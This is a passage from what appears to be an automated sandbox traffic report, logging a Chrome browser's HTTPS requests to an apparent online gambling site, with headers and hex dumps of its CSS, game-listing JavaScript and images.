                                                      2025-01-12 23:48:17 UTC4096INData Raw: 74 5f 75 6e 69 74 65 20 2e 47 61 6d 65 73 50 6f 64 3a 68 6f 76 65 72 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 75 6e 73 65 74 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2e 50 6f 64 49 6d 61 67 65 20 2e 50 6f 64 4e 61 6d 65 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 33 35 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 70 78 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 31 37 31 37 31 37 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 35 70 78 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73
                                                      Data Ascii: t_unite .GamesPod:hover { background-color: unset!important;}.PodImage .PodName { height: 35px; margin: 0 auto; text-align: center; border-radius: 5px; background-color: #171717; line-height: 35px; color: #fff; font-s
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 68 74 3a 20 30 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 36 35 29 3b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 74 72 61 6e 73 69 74 69 6f 6e 3a 20 30 2e 34 73 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 66 6c 6f 77 3a 20 63 6f 6c 75 6d 6e 3b 0a 7d 0a 2e 67 61 6d 65 73 2e 73 77 69 70 65 72 2d 63 6f 6e 74 61 69
                                                      Data Ascii: ht: 0; bottom: 0; background-color:rgba(0, 0, 0, 0.65); overflow: hidden; justify-content: center; max-height: 100%; padding: 0; opacity: 0; transition: 0.4s; display: flex; flex-flow: column;}.games.swiper-contai
                                                      2025-01-12 23:48:17 UTC1593INData Raw: 72 20 61 2c 0a 23 47 61 6d 65 2d 4d 65 6e 75 61 6c 20 75 6c 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2e 61 63 74 69 76 65 20 61 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 70 78 20 2d 32 32 32 70 78 3b 0a 7d 0a 0a 23 47 61 6d 65 2d 4d 65 6e 75 61 6c 20 75 6c 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 32 29 20 61 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 30 70 78 20 2d 33 36 70 78 3b 0a 7d 0a 0a 23 47 61 6d 65 2d 4d 65 6e 75 61 6c 20 75 6c 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 32 29 3a 68 6f 76 65 72 20 61 2c 0a 23 47 61 6d 65 2d 4d 65 6e 75 61 6c 20 75 6c 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 32 29 2e 61 63 74 69 76 65 20 61 7b
                                                      Data Ascii: r a,#Game-Menual ul li:nth-child(4n+1).active a{ background-position: 0px -222px;}#Game-Menual ul li:nth-child(4n+2) a{ background-position: 0px -36px;}#Game-Menual ul li:nth-child(4n+2):hover a,#Game-Menual ul li:nth-child(4n+2).active a{


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      140192.168.2.44989120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:16 UTC643OUTGET /plus/js/unite/egame_unite.js?ver=1723802385 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:17 UTC326INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:17 GMT
                                                      Content-Type: application/javascript
                                                      Content-Length: 12444
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Last-Modified: Fri, 16 Aug 2024 09:59:45 GMT
                                                      ETag: "66bf2311-309c"
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: REVALIDATED
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:17 UTC3770INData Raw: 76 61 72 20 66 61 76 6f 72 69 74 65 3d 5b 5d 3b 0a 76 61 72 20 74 69 6d 65 5f 6a 61 63 6b 70 6f 74 3b 0a 76 61 72 20 67 61 6d 65 6e 61 6d 65 5f 73 72 65 61 63 68 3d 27 27 3b 0a 76 61 72 20 65 67 61 6d 65 5f 75 6e 69 74 65 20 3d 7b 0a 20 20 20 20 63 61 6c 6c 62 61 63 6b 5f 67 61 6d 65 5f 63 61 74 3a 27 27 2c 0a 20 20 20 20 67 65 74 63 61 74 6c 69 73 74 3a 66 75 6e 63 74 69 6f 6e 28 70 6c 61 74 66 6f 72 6d 2c 65 67 61 6d 65 5f 66 69 6c 74 65 72 29 7b 0a 20 20 20 20 20 20 24 2e 67 65 74 28 27 2f 67 65 74 63 61 74 6c 69 73 74 2f 27 2b 70 6c 61 74 66 6f 72 6d 2c 27 27 2c 66 75 6e 63 74 69 6f 6e 28 6f 62 6a 29 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 73 74 72 3d 27 27 3b 0a 20 20 20 20 20 20 20 20 24 2e 65 61 63 68 28 6f 62 6a 2c 66 75 6e 63 74 69 6f 6e 28 6b
                                                      Data Ascii: var favorite=[];var time_jackpot;var gamename_sreach='';var egame_unite ={ callback_game_cat:'', getcatlist:function(platform,egame_filter){ $.get('/getcatlist/'+platform,'',function(obj){ var str=''; $.each(obj,function(k
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 29 2b 76 2e 6e 61 6d 65 2b 27 3c 2f 64 69 76 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 64 54 65 78 74 57 72 61 70 70 65 72 22 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2b 72 61 74 69 6e 67 2b 27 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 50 6f 64 43 61 74 65 67 6f 72 79 22 3e 27 2b 76 2e 63 6f 64 65 2b 27 3c 2f 64 69 76 3e 5c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                                      Data Ascii: )+v.name+'</div>\ </div>\ <div class="PodTextWrapper">\ '+rating+'\ <div class="PodCategory">'+v.code+'</div>\ <div class="
                                                      2025-01-12 23:48:17 UTC4096INData Raw: 20 20 20 20 20 20 66 6f 72 20 28 76 61 72 20 69 20 3d 20 30 3b 20 69 20 3c 20 6c 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6e 75 6d 5f 61 72 72 2e 75 6e 73 68 69 66 74 28 22 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 5f 6e 75 6d 73 29 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 20 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 74 68 69 73 29 2e 74 65 78 74 28 6e 75 6d 5f 61 72 72 5b 6e 5d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 7d 2c 0a 20 20 20 20 67 65 74 50 54 6a 61 63 6b 70 6f 74 3a 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 24 2e 67 65 74 28 27 2f 70 74
                                                      Data Ascii: for (var i = 0; i < l; i++) { num_arr.unshift(""); } $(_nums).each(function(n, e) { $(this).text(num_arr[n]); }); }); }, getPTjackpot:function() { $.get('/pt
                                                      2025-01-12 23:48:17 UTC482INData Raw: 74 5f 70 61 67 65 2b 31 29 2b 27 22 3e e2 80 ba 3c 2f 61 3e 3c 2f 6c 69 3e 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 6c 73 65 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 67 65 73 74 72 2b 3d 27 3c 6c 69 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 69 74 65 6d 20 64 69 73 61 62 6c 65 64 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 70 61 67 65 2d 6c 69 6e 6b 22 3e c2 bb 3c 2f 73 70 61 6e 3e 3c 2f 6c 69 3e 27 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a e5 88 b0 e6 9c 80 e5 90 8e e4 b8 80 e9 a1 b5 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 64 61 74 61 2e 63 75 72 72 65 6e 74 5f 70 61 67 65 20 21 3d 20 64 61 74 61 2e 6c 61 73 74 5f 70 61 67 65 29
                                                      Data Ascii: t_page+1)+'"></a></li>'; } else{ pagestr+='<li class="page-item disabled"><span class="page-link"></span></li>'; } /**/ if(data.current_page != data.last_page)


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      141192.168.2.449890154.86.18.44434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:17 UTC1320OUTGET /gdcode_1736725694 HTTP/1.1
                                                      Host: b45032.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/egame/224
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjBsZDJ0a3hCTDBuSGhDNTBORFFUcVE9PSIsInZhbHVlIjoiWVNaU2xVRXhZVjF6TW1kbytmUTV1UkVIRmRVNkJnQUFJdWhGYUVLNm51M2VBZ3F4UHYxd1ZJZUlnUXcwdnF2MkZrUWZJdHFoU25zTHl4UHN4VFJxY0E9PSIsIm1hYyI6IjllMGQ3NmU3NmRmZjVlYzczZmMyYjU3NjllNmM3NTVkOTkxMzk2ODRkZTcyOGUwZDEzZmQ5MTFmN2Q5NDI0OTgifQ%3D%3D; vanguard_session=eyJpdiI6InNHR2l3SDRCenJrYmtUSTYrT0dDeVE9PSIsInZhbHVlIjoiSVJsSktTWllHVVlkMHNqbmNyNXZwOFE0bDR6WnVObWRMK0ZOWWVVQll5XC90YnhhVmJNRG8xUXdNMGgySHVlOWZOSUJKZUpROTdcLzJlZXA2OU5NN21rZz09IiwibWFjIjoiM2NlZWI4ZDFmMjAyNDA5MjE5OWYxZGMwNjQ5YmM5MzJhMzViN2ViMTY1ODUwYjkzOGQ4OTVlMmVmMmEzM2Y0MSJ9
                                                      2025-01-12 23:48:17 UTC1137INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:17 GMT
                                                      Content-Type: image/jpeg
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Alt-Svc: h3="67e285f0.t74nx2b2.com:443";ma=604800;persist=1,h2="bt5.tuf3a353.com:443";ma=604800;persist=1
                                                      Cache-Control: max-age=315360000
                                                      Pragma: no-cache
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Set-Cookie: XSRF-TOKEN=eyJpdiI6InQwSDJDR2I4ekhWMXhTek1VNFozM1E9PSIsInZhbHVlIjoiM0JjMFRwTWFMUnJ5MVE3Z20yaUNZWmNrb29yRmxWQUdHcEhIZUk2Tmc5cFgwVko0XC9MZG1jNm9MKzFoUzJaNWEyMDh5ZEJNbmhWTkh1RHp3RldXNjNnPT0iLCJtYWMiOiJmZGYxYzIwNjgxZjVhOWYwNmY5NmFmNDc4ZWIyYWUyNTkyOWIzODcyN2M5Yzg5MjEzNDczMDIxMWU0ZjNiOGNkIn0%3D; expires=Mon, 13-Jan-2025 01:48:17 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                      Set-Cookie: vanguard_session=eyJpdiI6ImNlWTFldmthSVdEeWM2WjFYS054aFE9PSIsInZhbHVlIjoieDlwXC9mWGVLZGdcL3ZDenlSMHhwUWNcLzkzeTlvXC9hZmRrMXl1U3BwdXIxZ3FlY1NXckVzTjFDYnB6VU93dXRqQldVRWpPaExvNUJUeVE5bWJxMU9oQnV3PT0iLCJtYWMiOiJiMzBmNTQyNzlkZGIxOGViOTFlM2RhYzUzNTkzZGNiMzAzN2FlNGUyMDJiMGY2OTg3NjJhZWE4NGJhNzBiN2NlIn0%3D; expires=Mon, 13-Jan-2025 01:48:17 GMT; Max-Age=7200; path=/; secure; httponly; samesite=none
                                                      Server: nginx
                                                      2025-01-12 23:48:17 UTC1166INData Raw: 34 38 32 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff fe 00 3e 43 52 45 41 54 4f 52 3a 20 67 64 2d 6a 70 65 67 20 76 31 2e 30 20 28 75 73 69 6e 67 20 49 4a 47 20 4a 50 45 47 20 76 36 32 29 2c 20 64 65 66 61 75 6c 74 20 71 75 61 6c 69 74 79 0a ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 00 17 00 54 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01
                                                      Data Ascii: 482JFIF``>CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), default qualityC $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222T"


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      142192.168.2.44989420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC657OUTGET /images_plus/about/nav_icon.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/custom/egame_custom.css?ver=1736392866
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:18 UTC355INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 2699
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:35:07 GMT
                                                      ETag: "5fc5abdb-a8b"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC2699INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 01 b2 08 03 00 00 00 c9 59 f4 f6 00 00 01 3e 50 4c 54 45 00 00 00 ff ff ff 5c 5c 5c 5c 5c 5c 5c 5c 5c ff ff ff 5c 5c 5c 5c 5c 5c ff ff ff 5c 5c 5c ff ff ff 5c 5c 5c ff ff ff 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c ff ff ff 5c 5c 5c ff ff ff 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c 5c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 5c 5c 5c 5c 5c 5c ff ff ff ff ff ff ff ff ff 5c 5c 5c 5c 5c 5c ff ff ff 5c 5c 5c ff ff ff ff ff ff ff ff ff ff ff ff 5c 5c 5c ff ff ff 5c 5c 5c ff ff ff ff ff ff 5c 5c 5c 5c 5c 5c ff ff ff 5c 5c 5c 5c 5c 5c 5c 5c 5c ff ff ff 5c 5c 5c ff ff ff ff ff ff 5c 5c 5c 5c 5c 5c ff ff ff ff ff ff ff ff ff 5c 5c 5c 5c 5c 5c ff ff ff ff ff ff 5c 5c 5c ff
                                                      Data Ascii: PNGIHDRY>PLTE\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      143192.168.2.44989620.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC659OUTGET /images_plus/other/en/p-img1.png HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:18 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 7106
                                                      Connection: close
                                                      Last-Modified: Mon, 29 May 2023 08:55:47 GMT
                                                      ETag: "64746893-1bc2"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 cc 00 00 00 65 08 03 00 00 00 36 ef fc e6 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 02 b5 50 4c 54 45 00 00 00 23 23 23 26 26 26 24 24 24 21 21 21 22 22 22 25 25 25 1e 1e 1e 20 20 20 1f 1f 1f 00 00 00 1d 1d 1d 1c 1c 1c 27 27 27 28 28 28 1b 1b 1b ff ff ff 1a 1a 1a 29 29 29 19 19 19 18 17 18 fe fe fe 8a 8a 8a 89 89 89 88 88 88 fd fd fd 2a 2a 2a 7c 7c 7c 31 31 31 64 64 64 9b 9b 9b 87 87 87 b2 b2 b2 9a 9a 9a 7b 7b 7b d8 d8 d8 9c 9c 9c 99 99 99 b3 b3 b3 7e 7e 7e fc fc fc 78 78 78 46 46 46 98 98 98 b1 b1 b1 71 71 71 a0 a0 a0 17 17 17 9d 9d 9d 7d 7b 7c 37 37 37 2b 2b 2b 7f 7f 7f 8b 8b 8b d6 d6 d6 22 1f 20 65 65 65 54 54 54 86 86 86 96 96 96 56 56 56 67 67
                                                      Data Ascii: PNGIHDRe6gAMAasRGBPLTE###&&&$$$!!!"""%%% '''((()))***|||111ddd{{{~~~xxxFFFqqq}{|777+++" eeeTTTVVVgg
                                                      2025-01-12 23:48:18 UTC3366INData Raw: 3e 38 07 a6 52 e2 66 fe b2 f4 b5 45 ff dd f0 e6 6f 21 e1 74 9d 29 39 be e0 55 80 f8 aa e4 db ae 28 88 de 3b 61 92 f0 c2 39 be c3 30 38 6a 9d 1e 1f c3 8a 0a 80 fc f0 fd d7 3b 57 3f f8 55 49 c7 54 f9 ed 6b ab d4 3d 4e f0 2d ed b7 cf 94 d4 9e 9b df f1 2e cc 6b 5e 7e ff fd 67 1b 16 2d 37 bb 2a 17 6c f9 49 6f 18 32 bc 30 91 0f 95 44 4b 2f 96 9e 50 aa 61 f6 f4 82 e7 7e 31 fe cb 92 73 c8 0a 97 34 f3 4a e6 6c ca 9d 98 08 09 68 7c c3 de 3f 2d ca 79 4a ff 45 65 ee 97 5d ea a0 5b dd f5 81 c1 43 02 13 f9 80 29 89 7c 36 b1 f7 87 e4 8c f1 09 09 6f fc ef bb a7 e7 bf b6 63 ea 94 2d 25 ab a0 76 33 55 e1 55 9a 50 22 af ec cd 79 13 2a 9a 29 0d 1f 3c 3e 67 c1 99 bc ae 15 ef 6f e9 8a 4c cb 42 af 7d 3e f2 7c a7 61 70 0f 18 d2 03 22 1a e8 e3 27 6e 7e 7a eb ff 6c 2e 79 e8 c6 a4
                                                      Data Ascii: >8RfEo!t)9U(;a908j;W?UITk=N-.k^~g-7*lIo20DK/Pa~1s4Jlh|?-yJEe][C)|6oc-%v3UUP"y*)<>goLB}>|ap"'n~zl.y


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      144192.168.2.44989720.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:48:18 UTC659OUTGET /images_plus/other/en/p-img2.jpg HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://5getfab.segrft.com/plus/css/custom/header_custom.css?ver=1685593131
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:48:18 UTC358INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:48:18 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 22853
                                                      Connection: close
                                                      Last-Modified: Mon, 29 May 2023 08:57:51 GMT
                                                      ETag: "6474690f-5945"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: MISS
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:48:18 UTC3738INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 01 07 00 cc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 06 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 07 08 01 03 09 02 0a ff c4 00 1c 01 01 00 03 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e2 e0
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:48:18 UTC4096INData Raw: 6d aa 7b fe d5 00 e5 52 b3 d2 19 71 39 42 5e 49 34 71 1d 08 8d ed c7 fc 3e 51 4c 37 f0 fa fd db 71 5e 34 92 64 c9 3d 11 b7 47 ad d0 dc a2 65 68 d6 54 ff 00 49 99 17 c7 30 f2 ec bd 54 62 e4 c1 f7 47 63 79 7b 53 3e a4 32 36 1a d3 22 dc 1e 45 44 48 2c 4a c4 6c ff 00 7c 8b b3 ba 14 5b 6b ed 7a de 85 49 84 b4 c3 d8 47 cc 21 45 a4 12 1e 24 be cb 1e 1b c2 de cc 15 cd 84 ca 0b 7d 6b ee 89 78 3b 75 ba a0 84 44 14 cc ea bd 08 68 a5 dc 9e 2f 48 dd 9c a2 bd 82 7d a3 22 38 d1 06 4f 09 bc 34 bb 94 72 af fc 34 cd cd fd fc 8d be 35 ba 35 ef e1 63 4e a3 ca 55 64 97 77 26 66 ba 2b a7 b1 7b 8c 5c 2a 28 1c 74 f0 a6 f7 5c bb 51 54 5b d7 23 98 8f f4 51 9d 21 74 c9 c9 d1 39 1a c9 80 2c e2 1f 5b 5b 1f ad f6 ce 38 4b 0b 60 7e ce 20 84 bd cc c6 ac b5 ae 4e 9b 36 3d 82 55 21 99 50
                                                      Data Ascii: m{Rq9B^I4q>QL7q^4d=GehTI0TbGcy{S>26"EDH,Jl|[kzIG!E$}kx;uDh/H}"8O4r455cNUdw&f+{\*(t\QT[#Q!t9,[[8K`~ N6=U!P
